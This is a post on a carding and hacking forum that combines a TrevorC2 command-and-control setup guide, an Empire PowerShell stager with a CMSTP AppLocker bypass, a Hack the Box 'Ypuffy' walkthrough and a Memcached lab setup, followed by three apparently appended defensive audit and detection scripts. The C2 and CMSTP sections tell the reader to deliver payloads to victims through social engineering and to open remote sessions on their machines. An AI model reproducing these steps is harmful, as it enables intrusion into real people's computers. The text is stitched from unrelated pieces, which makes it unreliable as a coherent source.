Blackhat Carding Forum | Carding Forum - Credit Cards - Hacking Forum - Cracking Forum | Bhcforums.cc

[Guide] How to TrevorC2 – Command and Control
TrevorC2 is a command and control framework. It is a client/server model that works through a browser masquerading as a C2 tool. It works at different time intervals, which makes it almost impossible to detect. The tool is written in Python, but it is also compatible with C#, PowerShell, or any other platform. It is supported on Windows, macOS and Linux. It is very easy and convenient to use.
You can download it from:
git clone [To see content please register here]
[Image: 1.png?w=687]
Once it’s downloaded, open the folder and then open the trevorc2_server.py file and change the IP to your localhost IP as shown in the image below. Also, provide the site that will be cloned to the trevorc2 server.
[Image: 2.png?w=687]
Then, start and run the trevorc2 framework.
[Image: 3.png?w=687]
Once the trevorc2 is up and running, change the IP to your localhost IP in trevorc2.ps1 file.
[Image: 4.png?w=687]
Then send this file to the victim using any desired social engineering method. Once the file is executed by the victim, you will have your session as shown in the image below :
To see the sessions type:
list

And to access this session type:
interact <serial number of session>

[Image: 5.png?w=687]

By default, AppLocker allows binaries in the folder to execute, which is the main reason it can be bypassed. Such binaries can be used to bypass AppLocker as well as UAC. One such Microsoft binary is CMSTP. CMSTP accepts INF files, so exploitation through an INF file is possible, and this section covers how that is done.
Non-system processes like cmstp.exe originate from software installed on your system, since most applications store data on your hard drive and in your system’s registry. The file contains machine code. If you start Microsoft® Connection Manager on your system, the instructions contained in cmstp.exe run on your system. For this, the file is loaded into main memory (RAM) and runs there as a Microsoft Connection Manager Profile Installer process (also called a task). CMSTP accepts SCT files and runs them without suspicion, so we will create a malicious SCT file to reach our goal. We will use Empire PowerShell for this. For a detailed guide on Empire PowerShell click [To see content please register here].

Launch the empire framework from the terminal of Kali and then type the following commands to create your malware :
listeners
uselistener http
set Host 192.168.1.109
execute


[Image: 1.png?w=687]
The above commands create a listener. Then type back to return from the listener interface, and to create the SCT file type:
usestager windows/launcher_sct
set Listener HTTP
execute


Running the above exploit will create your SCT file. We will use the following script to execute our file in PowerShell. In this script give the path of your SCT file and add the following line as shown in the image.
Download this script from [To see content please register here]:

[Image: 2.png?w=687]
Now, send the file to the victim’s PC and run the following command in the victim’s command prompt:
cmstp.exe /s shell.inf

[Image: 3.png?w=687]
As soon as you run the command, you will have a session. Use the following command to access your session :
interact <session name>

This way, you can use the CMSTP binary to bypass AppLocker restrictions. CMSTP needs an INF file, and by using it to your advantage you can have access to the victim’s PC.
[Image: 5.png?w=687]

Today we are going to solve another CTF challenge, “Ypuffy”. It is a retired vulnerable lab presented by Hack the Box to help pentesters practice online penetration testing according to their experience level; they have a collection of vulnerable labs as challenges, from beginner to expert level.
Level: Intermediate
Task: To find user.txt and root.txt file
Note: Since these labs are available online, they have a static IP. The IP of Ypuffy is 10.10.10.107
Penetrating Methodology
  • Network scanning (Nmap)
  • Scanning port 389 using LDAP script
  • Fetching shared directory using smbclient and finding the private key
  • Connecting to VM with SSH using the private key
  • Enumerating files with SUID bit set
  • Discovering that alice1978 can run ssh-keygen as userca
  • Discovering authorized commands at ssh login
  • Fetching principal using the curl command
  • Enumerating public certificate in system
  • Signing the RSA key with the CA certificate using the doas command and the previously found principal
  • Logging into ssh using new private key pair
  • Snagging the flag
Walkthrough
Let’s start off with our basic nmap command to find out the open ports and services.
nmap -sV -sC 10.10.10.107

[Image: 1.png?w=687&ssl=1]
The nmap scan shows us that there are 5 ports open: 22(SSH), 80(HTTP), 139(SMB), 389(LDAP), 445(SMB)
As LDAP service is running on port 389, we use nmap script called “ldap-search” to enumerate the target machine and we find the password hash for user “alice1978”.
nmap -p389 --script=ldap-search 10.10.10.107

[Image: 2.png?w=687&ssl=1]
Now that we have the username and password hash, we can log in over SMB using smbclient.
First, we check the shared directories available on the target machine and find one called “alice”. We then access the share and find a file called “my_private_key.ppk”, which we download to our local system.
smbclient -L \\\\10.10.10.107\\ -U alice1978%<hash> --pw-nt-hash
smbclient \\\\10.10.10.107\\alice -U alice1978%<hash> --pw-nt-hash

[Image: 3.png?w=687&ssl=1]
The file we downloaded was a “Putty Private Key” file, so we use puttygen to convert the file into RSA private key. After converting it into RSA key, we change the permission of the RSA key and use it to login through SSH.
puttygen my_private_key.ppk -O private-openssh -o id_rsa
chmod 600 id_rsa
ssh -i id_rsa [email protected]


After logging in through SSH, we find a file called “user.txt”. We take a look at the contents of the file and find the first flag.
[Image: 4.png?w=687&ssl=1]
Now we check the files with suid bit enabled and find that “doas” is available on the target machine. It is a command utility similar to the “sudo” command. Now we check “/etc/doas.conf” to find what commands we can run. We find that we can run “/usr/bin/ssh-keygen” as user “userca”.
find / -perm -4000 2>/dev/null
cat /etc/doas.conf


[Image: 5.png?w=687&ssl=1]
To further enumerate the target machine, we open the ssh configuration file at “/etc/ssh/sshd_config” and find we can run the command “/usr/bin/curl [To see content please register here]” and “/usr/bin/curl [To see content please register here]”.

[Image: 6.png?w=687&ssl=1]
Further enumerating the web application, we find that we can request keys from “http://127.0.0.1/sshauth?type=key&username=%u” and principals from “http://127.0.0.1/sshauth?type=principals&username=%u”, we requested keys for root user and get no response but we are successfully able to get root user’s principal.
curl "http://127.0.0.1/sshauth?type=key&username=root"
curl "http://127.0.0.1/sshauth?type=principals&username=root"


[Image: 7.png?w=687&ssl=1]
As we have the root user’s principal, we can generate SSH keys and sign them with root’s principal. Doing so will allow us to login through SSH as root. Now we know we can run ssh-keygen to generate SSH keys but first, we need a certificate to sign the SSH key. We enumerate the machine to find a certificate and find one inside /home/userca directory.
[Image: 8.png?w=687&ssl=1]
First, we generate SSH keys and move them into the /tmp directory. Then we sign the keys as userca to read the certificate inside /home/userca/ca.
ssh-keygen
mv .ssh/id_rsa* /tmp/
doas -u userca /usr/bin/ssh-keygen -s /home/userca/ca -n 3m3rgencyB4ckd00r -I root /tmp/id_rsa.pub


[Image: 9.png?w=687&ssl=1]
After signing the RSA keys, we use the RSA key to login through SSH as the root user. After logging in we find a file called “root.txt”. We take a look inside the content of the file and find the final flag.
ssh -i /tmp/id_rsa root@localhost

[Image: 10.png?w=687&ssl=1]

In this article, we are going to learn about setting up a Memcached pen-testing lab in Ubuntu 18.04. Memcached servers are used by corporations to increase the speed of their network, as they store frequently used data. This helps to take the load off the hardware and decrease the time taken.
Table of Contents
  • Introduction to Memcached.
  • Memcached Installation.
  • Memcached Configuration.
Introduction to Memcached
Memcached is a distributed memory object caching system. It is open source and free of charge. It is used to speed up web applications by serving database results from cache memory. It is an in-memory key-value store for small chunks of arbitrary data (strings, objects) that result from database calls, API calls, or page rendering. Memcached is simple yet powerful: it promotes quick deployment and ease of development, and solves many problems facing large data caches. Its API is available for most popular languages.
Memcached Installation
To install, boot up your Ubuntu machine and open the terminal.
Note: Apache2 should be installed before installing Memcached. You can easily install Apache2 by just typing in a simple command.
apt install apache2

Now that we are all done, let’s setup Memcached by typing the commands shown below.
apt install memcached

[Image: 1.png?w=687&ssl=1]
After installing Memcached, add the ppa:ondrej/php PPA to your Ubuntu system’s repositories to download and install the latest version of PHP available. Follow the commands as shown below.
add-apt-repository ppa:ondrej/php

[Image: 4.png?w=687&ssl=1]
After adding the repository, update the system by typing in the following command.
apt update

[Image: 5.png?w=687&ssl=1]
Now, install PHP by executing the command shown below :
apt install -y php php-dev php-pear libapache2-mod-php

[Image: 6.png?w=687&ssl=1]
Now that PHP has been installed successfully in our system, we will go ahead and install the PHP Memcached module by executing the below command:
apt install -y php-memcached

[Image: 7.png?w=687&ssl=1]
Once the installation is complete, restart the Apache2 service.
service apache2 restart

[Image: 8.png?w=687&ssl=1]
Now check whether the PHP extension is working fine or not by creating an info.php by using the code mentioned below with nano or any text editor you like.
<?php
phpinfo();
?>


[Image: 9.1.png?w=687&ssl=1]
Now save the file in /var/www/html
Once the file is saved, access it from your web browser by typing in the following URL.
localhost/info.php

You should see the results as shown in the image below.
[Image: 9.png?w=687&ssl=1]
Memcached Configuration
Here we configure the Memcached server by editing its configuration file, which is located at /etc/memcached.conf. Open memcached.conf using nano or any other text editor. The options shown below are present and active by default. They are mentioned here so that you know where to find them, and why and how to change them if necessary. The following options are important for low-level Memcached server configuration:
-m 64
Here,
m: specifies the maximum memory limit which is used by Memcached daemon. By default, this limit is 64 MB
-p 11211
Here,
p: specifies the port number. By default, it’s 11211.
-u memcache
Here,
u starts the daemon tool as root.
After this, comment out “-l 127.0.0.1” by adding # as shown in the image, as it is not commented out by default. Once it is commented out, the Memcached listener is no longer bound to the loopback IP. Hence, traffic can come from any IP over the internet.
[Image: 10.png?w=687&ssl=1]
Now once you saved the configuration file after making the changes, restart the service by using the following command :
service memcached restart

Then use the following command to confirm whether the Memcached configuration is working or not:
ss -tnl

[Image: 11.png?w=687&ssl=1]
Once you are done with the above commands, connect Memcached through telnet and do a version check by typing in “version” command:
telnet localhost 11211
version


[Image: 12.png?w=687&ssl=1]
Now, you can use nmap to check if the Memcached service is running on the server.
nmap -sV -p- 192.168.1.32

[Image: 13.png?w=687&ssl=1]
Conclusion
To conclude, we can say that Memcached is a distributed memory caching system. It uses expiration timeouts i.e. if the server has no memory left, it will evict items to replace them with the new ones. The items it chooses to replace are the ones which have not been requested for a long period of time. And so, in the above article, we have provided a basic guide to set up the Memcached penetration testing lab.
Reply
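From the defender's side, the Memcached configuration change described in the post (removing the loopback bind) is the setting to audit for on production hosts. The following is an added example, not part of the original post: it parses a memcached.conf body and reports exposure. The sample files are constructed, and the parser assumes -l carries bare addresses without a port suffix.

```python
import ipaddress
import shlex

# Constructed sample: the lab file described above, loopback bind commented out.
LAB_CONF = """\
-m 64
-p 11211
-u memcache
#-l 127.0.0.1
"""
# Constructed sample: the same file with the loopback bind still active.
LOOPBACK_CONF = LAB_CONF.replace("#-l", "-l")


def active_options(text):
    """Map each active (uncommented) option to its value, or True if bare."""
    opts = {}
    for raw in text.splitlines():
        parts = shlex.split(raw, comments=True)  # drops '#' comments
        if parts:
            opts[parts[0]] = parts[1] if len(parts) > 1 else True
    return opts


def is_loopback(host):
    """True for loopback IP literals and the name 'localhost'."""
    try:
        return ipaddress.ip_address(host).is_loopback
    except ValueError:
        return host == "localhost"


def audit(text):
    """Return a list of exposure findings for a memcached.conf body."""
    opts = active_options(text)
    findings = []
    listen = opts.get("-l")
    if listen in (None, True):
        findings.append("no -l address: listener is reachable on every interface")
    else:
        exposed = [h.strip() for h in listen.split(",") if not is_loopback(h.strip())]
        if exposed:
            findings.append("listener bound to non-loopback address: " + ", ".join(exposed))
    # Only report missing SASL when the listener is actually network-reachable.
    if findings and "-S" not in opts:
        findings.append("network-reachable without SASL authentication (-S)")
    if opts.get("-u") == "root":
        findings.append("daemon runs as root")
    return findings


if __name__ == "__main__":
    for name, conf in (("lab", LAB_CONF), ("loopback", LOOPBACK_CONF)):
        print(name, audit(conf) or "no findings")
```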
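The CMSTP section of the post relies on one observable command line, cmstp.exe run with /s and an INF file, which is what process-creation monitoring can key on. The following is an added detection example, not part of the original post: the event records and their field names are constructed for illustration and do not follow any specific logging product's schema.

```python
import ntpath
import shlex

# Constructed process-creation records (hypothetical field names), not real logs.
SAMPLE_EVENTS = [
    {"host": "WS01", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\cmstp.exe",
     "command_line": "cmstp.exe /s shell.inf"},
    {"host": "WS02", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "command_line": r"notepad.exe C:\Users\bob\notes.inf"},
    {"host": "WS03",
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\cmstp.exe",
     "command_line": r'"C:\Windows\System32\cmstp.exe" /S "C:\Users\Public\My Files\vpn.inf"'},
    {"host": "WS04", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmstp.exe",
     "command_line": r"cmstp.exe C:\VPN\corp.inf"},
]


def silent_cmstp_installs(events):
    """Return one finding per cmstp.exe launch that passes /s and an INF file."""
    findings = []
    for ev in events:
        if ntpath.basename(ev["image"]).lower() != "cmstp.exe":
            continue
        try:
            # posix=False keeps backslashes literal and quoted paths in one token
            argv = shlex.split(ev["command_line"], posix=False)
        except ValueError:  # unbalanced quotes: fall back to whitespace split
            argv = ev["command_line"].split()
        args = [a.strip('"') for a in argv[1:]]
        silent = any(a.lower() == "/s" for a in args)
        infs = [a for a in args if a.lower().endswith(".inf")]
        if silent and infs:
            findings.append({
                "host": ev["host"],
                "inf": infs[0],
                "parent": ntpath.basename(ev["parent"]).lower(),
            })
    return findings


if __name__ == "__main__":
    for hit in silent_cmstp_installs(SAMPLE_EVENTS):
        print(hit)
```

The parent process and INF location in each finding are the fields to triage on, since an interactive launch without /s (WS04 in the sample) is not reported.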
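The Ypuffy escalation in the post works because a doas rule lets an ordinary user run ssh-keygen, with any arguments, as the account that holds the SSH CA key. The following is an added audit example, not part of the original post: it flags doas.conf rules that permit ssh-keygen without an args restriction. The sample file is constructed, since the real /etc/doas.conf appears on the page only as a screenshot.

```python
import posixpath

# Constructed sample: the second rule is modelled on what the walkthrough
# reports (alice1978 may run /usr/bin/ssh-keygen as userca).
SAMPLE_DOAS_CONF = """\
permit keepenv :wheel
permit nopass alice1978 as userca cmd /usr/bin/ssh-keygen
permit nopass setenv { PATH=/bin } backup as root cmd /sbin/dump args -0au /home
permit nopass ops as userca cmd /usr/bin/ssh-keygen args -l -f /home/userca/ca.pub
"""

OPTIONS = {"nopass", "nolog", "persist", "keepenv"}


def parse_rule(line):
    """Parse one doas.conf line: action [options] identity [as t] [cmd c [args ...]]."""
    tok = line.split("#", 1)[0].split()
    if not tok or tok[0] not in ("permit", "deny"):
        return None
    i = 1
    while i < len(tok) and (tok[i] in OPTIONS or tok[i] == "setenv"):
        if tok[i] == "setenv":  # skip the { ... } block
            while i < len(tok) and not tok[i].endswith("}"):
                i += 1
        i += 1
    if i >= len(tok):
        return None
    rule = {"action": tok[0], "identity": tok[i],
            "target": None, "cmd": None, "args": None}
    i += 1
    while i < len(tok):
        if tok[i] == "args":  # everything after 'args' must match exactly
            rule["args"] = tok[i + 1:]
            break
        if tok[i] in ("as", "cmd") and i + 1 < len(tok):
            rule["target" if tok[i] == "as" else "cmd"] = tok[i + 1]
            i += 1
        i += 1
    return rule


def unrestricted_keygen_rules(conf_text):
    """Return (identity, target) for permit rules allowing ssh-keygen with any args."""
    hits = []
    for line in conf_text.splitlines():
        rule = parse_rule(line)
        if (rule and rule["action"] == "permit" and rule["cmd"]
                and posixpath.basename(rule["cmd"]) == "ssh-keygen"
                and rule["args"] is None):
            # No 'args' keyword means the caller chooses the arguments,
            # including -s <ca key> and -n <principal>.
            hits.append((rule["identity"], rule["target"] or "any user"))
    return hits


if __name__ == "__main__":
    print(unrestricted_keygen_rules(SAMPLE_DOAS_CONF))
```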





Messages In This Thread
[Guide] How to TrevorC2 – Command and Control - by NINZA - 05-14-2020, 11:26 AM


